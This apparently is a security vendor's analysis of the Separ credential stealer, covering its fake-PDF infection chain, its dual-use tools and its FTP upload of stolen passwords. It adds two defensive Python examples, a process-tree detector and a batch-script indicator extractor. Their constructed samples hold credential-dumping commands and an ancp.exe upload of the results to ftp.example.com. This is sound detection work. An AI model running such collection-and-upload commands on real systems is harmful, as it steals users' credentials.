Recently we came across renewed activity of the infamous credential stealer Separ, which our product prevented in customers’ environments. Previous attacks based on earlier variants of Separ date back to November 2017, with related info-stealers being active in the wild as far back as 2013.
The credential stealer Separ is unusual in that it uses a combination of very short script and batch files, together with legitimate executables, to carry out all of its malicious business logic. Separ is therefore an excellent example of the evasive attack technique commonly termed "Living off the Land". In addition, Separ masquerades as an Adobe-related program: a fake PDF document serves as the initial infection vector, and the malicious scripts and executables are named to resemble Adobe programs.
"Living off the Land" attacks are based on legitimate files which are either common within the attacked organization or are widely-used administrative tools, and which can be abused to perform malicious functions. These tools are sometimes referred to as "Dual-Use" tools. Although "Living off the Land" is often considered a type of file-less attack, that label is not strictly accurate, as the attack does involve executable files. In many cases these files are already present on disk in the victim's machine (hence the term "Living off the Land"). In other cases they are written to disk, but, as noted above, they are not malicious per se and therefore go unnoticed. This technique, and the reason it is nonetheless classified as a file-less attack, are described in detail in Deep Instinct's whitepaper on file-less attacks, published in March 2018.
The attack is ongoing
Access to the hosting service used by Separ in this recent attack shows that its activity continues, and data stolen from many additional victims is being uploaded daily. The attack has affected hundreds of companies, located mainly in South East Asia and the Middle East, with some targets located in North America. Based on the names of the fake documents which initiate the attack, it appears the attacker is targeting business organizations, as most fake documents appear to be concerned with quotations, shipments, and equipment specifications.
Although this specific attack wave is new, having surfaced only within the past few weeks, our research shows that variants of Separ have been around for several years, with older variants sharing some of the techniques and mechanisms outlined below.
Infection chain and malicious logic
As in previous waves of Separ seen in the wild, the attack begins with a phishing email containing a malicious attachment. In this instance the attachment was a decoy PDF document which was in fact a self-extracting archive. The decoy is crude, however: the "document" carries an .exe extension. The self-extractor contains all the files used in the attack: a VB Script, two batch scripts, and four executable files, named adobel.vbs, adob01.bat, adob02.bat, adobepdf.exe, adobepdf2.exe, ancp.exe, and Areada.exe. Most of the files are named to resemble Adobe-related files. The role of each file is outlined in detail below.
Overall, the attack flow is as follows:
Once the user clicks on the "PDF document" attached to the phishing email, the self-extractor calls wscript.exe to run the VB Script adobel.vbs, which it has just extracted.
This VB Script then calls a first batch script, adob01.bat, which sets up several directories and copies files to them, using xcopy.exe and attrib.exe, before launching a second batch script.
The second batch script, adob02.bat, performs the main malicious actions: it runs the credential dumping tools, collects their output together with the victim's ipconfig data, and uploads the results over FTP. The individual tools are described below.
The attackers make no attempt to hide their intentions, and use no obfuscation or evasion techniques. All the output file names and the credentials used by the attackers are hard-coded in the scripts.
In order to carry out the malicious logic of the attack, Separ uses password dumping tools by SecurityXploded, contained in the initial self-extractor, with which it steals various user credentials before uploading them to the hosting service.
Separ also uses additional legitimate executables for supporting actions: xcopy.exe, attrib.exe, sleep.exe (renamed Areada.exe), and ancp.exe. Details regarding ancp.exe are given in the next section.
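The chain described above (a self-extractor launching wscript.exe with a .vbs, cmd.exe running .bat files, xcopy/attrib staging the payload, and dropped tools executed from a user-writable directory) is exactly what an endpoint sensor records as process-creation events. The following added example, which is not code from the original post or from Deep Instinct, scores such events for that pattern. The events, user name, paths, account and host are all constructed to imitate the chain described; the detection keys on scripting hosts and batch files launched from user-writable paths combined with dual-use tools in the same process tree, not on the Adobe-style file names, so it is not defeated by a simple rename.

```python
"""Score process-creation events for a Separ-style living-off-the-land chain.

Constructed example: EVENTS imitates Sysmon Event ID 1 records in the shape
the post describes (self-extractor -> wscript.exe -> cmd.exe/.bat ->
xcopy/attrib -> dropped tools). It is NOT real telemetry from the campaign.
"""
import re
from collections import defaultdict

# Constructed sample events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # Malicious chain rooted at the fake "PDF" self-extractor (invented name).
    {"pid": 200, "ppid": 100, "image": r"C:\Users\alice\Downloads\Quotation.pdf.exe",
     "cmd": r'"C:\Users\alice\Downloads\Quotation.pdf.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\adobel.vbs"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\adob01.bat"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\xcopy.exe",
     "cmd": r'xcopy /Y "C:\Users\alice\AppData\Local\Temp\*.exe" "C:\Users\alice\AppData\Local\adobe"'},
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\attrib.exe",
     "cmd": r'attrib +h "C:\Users\alice\AppData\Local\adobe"'},
    {"pid": 700, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\adob02.bat"'},
    {"pid": 800, "ppid": 700, "image": r"C:\Users\alice\AppData\Local\adobe\adobepdf.exe",
     "cmd": "adobepdf.exe"},
    {"pid": 900, "ppid": 700, "image": r"C:\Users\alice\AppData\Local\adobe\ancp.exe",
     "cmd": "ancp.exe -u acct01 -p secret ftp.example.com /client01 01.txt"},
    # Benign chain: a logon script copying data with the same dual-use tool.
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c \\fileserver\netlogon\backup.bat"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\xcopy.exe",
     "cmd": r"xcopy /s D:\data \\backup\share"},
]

USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)
SYSTEM_DIR = re.compile(r"^[A-Z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)
DOC_MASQUERADE = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.exe$", re.I)  # "file.pdf.exe"
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)
BATCH_EXT = re.compile(r"\.(bat|cmd)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STAGING_TOOLS = {"xcopy.exe", "attrib.exe"}


def indicators(ev):
    """Return the set of LotL indicators a single process-creation event shows."""
    name = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd, image = ev["cmd"], ev["image"]
    found = set()
    if DOC_MASQUERADE.search(image):
        found.add("document_masquerade_exe")
    if name in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd):
        found.add("script_host_user_path")
    if name == "cmd.exe" and BATCH_EXT.search(cmd) and USER_WRITABLE.search(cmd):
        found.add("batch_user_path")
    if name in STAGING_TOOLS:
        found.add("staging_tool")
    if not SYSTEM_DIR.match(image) and USER_WRITABLE.search(image):
        found.add("exe_from_user_path")
    return found


def chain_roots(events):
    """Map every pid to the top of its process tree, stopping below explorer.exe
    (the user's shell) or at a process whose parent was not recorded."""
    by_pid = {e["pid"]: e for e in events}

    def root_of(pid):
        while True:
            parent = by_pid.get(by_pid[pid]["ppid"])
            if parent is None or parent["image"].lower().endswith("\\explorer.exe"):
                return pid
            pid = parent["pid"]

    return {e["pid"]: root_of(e["pid"]) for e in events}


def score_chains(events):
    """Union the indicators of every process under the same root pid."""
    roots = chain_roots(events)
    per_root = defaultdict(set)
    for ev in events:
        per_root[roots[ev["pid"]]] |= indicators(ev)
    return dict(per_root)


def flag_chains(events, min_indicators=3):
    """Flag a tree when it shows at least `min_indicators` distinct indicators
    and at least one script or batch launch from a user-writable path. The
    benign xcopy-only chain below the threshold is deliberately not flagged."""
    flagged = []
    for root, inds in score_chains(events).items():
        scripted = {"script_host_user_path", "batch_user_path"} & inds
        if scripted and len(inds) >= min_indicators:
            flagged.append((root, sorted(inds)))
    return sorted(flagged)


if __name__ == "__main__":
    for root, inds in flag_chains(EVENTS):
        print(f"root pid {root}: {', '.join(inds)}")
```

The root-finding step matters more than any single indicator: xcopy.exe and attrib.exe run legitimately all day, and cmd.exe running a batch file from a network share is routine, so the signal is the combination within one tree rooted at an executable the user launched from Downloads or Temp. Tuning `min_indicators` and the path patterns to the environment is the expected operational work.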
Stolen data uploaded to a legitimate FTP service
Following infection and password extraction, the malware uses ancp.exe, an FTP client, to upload the collected files to freehostia.com. Both the executable and the service are legitimate: ancp.exe is taken from NcFTP, a legitimate FTP client suite, while FreeHostia is a well-known and widely-used hosting service.
The upload is performed using hard-coded user names and passwords. Using these credentials, we were able to access the FTP server and view data organized into several client directories.
Each client directory, however, contained data belonging to several different victims, collected over the last few weeks. The uploaded data contains ipconfig results in addition to email and browser passwords.
We were able to access the FTP server several times, and the growth in the number of victims was clearly visible, meaning the attack is ongoing and successfully infecting many victims.
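Because Separ hard-codes its output file names and its FTP credentials in the batch scripts, most of the indicators an analyst needs (staging file names, upload host, account, remote client directory) can be pulled straight out of the script text. The following added example, which is not the post's or Deep Instinct's code, does that for a constructed batch script in the shape described above: dumper output redirected to text files, followed by an NcFTP-derived uploader invocation. The script contents, host, account, password and file names are invented. ancp.exe is treated as an ncftpput alias because the post identifies it as a renamed NcFTP binary, and the command-line shape parsed (options such as -u and -p, then host, remote directory and files) is the standard ncftpput form; the list of options that consume an argument is an assumption based on the ncftpput manual.

```python
"""Extract hard-coded collection outputs and FTP upload parameters from a
Separ-style batch script.

Constructed example: SAMPLE_BAT imitates the shape the post describes and is
NOT the real adob02.bat. Host, account, password and paths are invented.
"""
import re

SAMPLE_BAT = r'''@echo off
cd /d "%APPDATA%\adobe"
ipconfig /all > "%APPDATA%\adobe\01.txt"
adobepdf.exe > "%APPDATA%\adobe\02.txt"
adobepdf2.exe > "%APPDATA%\adobe\03.txt"
ancp.exe -u acct01 -p "S3cret!" -m ftp.example.com /client01 "%APPDATA%\adobe\01.txt" "%APPDATA%\adobe\02.txt" "%APPDATA%\adobe\03.txt"
'''

TOKEN = re.compile(r'"[^"]*"|\S+')          # quoted string or bare word
REDIRECT = re.compile(r">>?")                 # ">" or ">>"
# ncftpput options that take a following argument (assumed from the man page:
# -u user, -p password, -P port, -t timeout, -r redials, -T/-S temp prefix/suffix).
VALUE_OPTS = {"-u", "-p", "-P", "-t", "-r", "-T", "-S"}
# ancp.exe is the renamed NcFTP client the post describes.
UPLOADERS = {"ncftpput", "ncftpput.exe", "ancp.exe"}


def tokens(line):
    """Split a batch line on whitespace while keeping quoted arguments whole."""
    return [t.strip('"') for t in TOKEN.findall(line)]


def parse_upload(toks):
    """Parse `ncftpput [options] host remote-dir local-files...` into a dict,
    or return None if the positional part is too short to be an upload."""
    opts, positional, i = {}, [], 1
    while i < len(toks):
        tok = toks[i]
        if tok in VALUE_OPTS and i + 1 < len(toks):
            opts[tok] = toks[i + 1]
            i += 2
        elif tok.startswith("-"):
            i += 1                           # boolean flag such as -m (mkdir)
        else:
            positional.append(tok)
            i += 1
    if len(positional) < 3:
        return None
    return {
        "tool": toks[0],
        "host": positional[0],
        "remote_dir": positional[1],
        "files": positional[2:],
        "user": opts.get("-u"),
        "password": opts.get("-p"),
    }


def triage_batch(text):
    """Return the redirected outputs, upload parameters and tool names found."""
    report = {"outputs": [], "uploads": [], "tools": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("@", "::")) or line.lower().startswith("rem "):
            continue
        redirect = REDIRECT.search(line)
        if redirect:                         # "<tool> ... > <output file>"
            cmd_toks = tokens(line[:redirect.start()])
            target = tokens(line[redirect.end():])
            if cmd_toks and target:
                report["outputs"].append((cmd_toks[0].lower(), target[0]))
                report["tools"].append(cmd_toks[0].lower())
            continue
        toks = tokens(line)
        name = toks[0].rsplit("\\", 1)[-1].lower()
        report["tools"].append(name)
        if name in UPLOADERS:
            upload = parse_upload(toks)
            if upload:
                report["uploads"].append(upload)
    return report


def indicators_of(report):
    """Flatten a triage report into the strings worth blocking or hunting for.
    The password is deliberately left out of this list."""
    iocs = {target for _, target in report["outputs"]}
    for up in report["uploads"]:
        iocs.add(up["host"])
        iocs.add(up["remote_dir"])
        iocs.update(up["files"])
    return sorted(iocs)


if __name__ == "__main__":
    result = triage_batch(SAMPLE_BAT)
    for up in result["uploads"]:
        print(f"upload via {up['tool']} to {up['host']}{up['remote_dir']} as {up['user']}")
    print("\n".join(indicators_of(result)))
```

The same parser works on the first batch script, where the interesting lines are the xcopy and attrib invocations rather than redirects; the tool list it returns is what to compare against the dual-use binaries already in use in the environment.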
Although the attack mechanism used by this malware is very simple, and the attacker has made no attempt to evade analysis, the growth in the number of victims shows that simple attacks can be very effective. The use of scripts and legitimate binaries in a "Living off the Land" scenario means the attacker evades detection despite the simplicity of the attack. Thanks to these mechanisms, and despite the lack of obfuscation or evasion, this and similar attacks have been present in the wild for several years, which shows that many security solutions have difficulty detecting "Living off the Land" scenarios. It should also be noted that the attack could easily be modified to evade detection and complicate analysis.
As discussed in our white paper on file-less malware, the abuse of administrative tools, or of an organization's own legitimate internal tools, requires organizations to change their defense mechanisms. To be better protected, organizations should tightly control which users are allowed to run administrative or native tools, and which actions those tools may perform.
In order to guard from these types of attacks, organizations should also undertake the following:
We are in the process of notifying all relevant parties which have been affected by the attack.
Original sha256: fc1b755217ee2d12b05b5211602a83dcc0ad0ce2f1271b904e1a125a38927780
Additional files used in attack:
Recent similar samples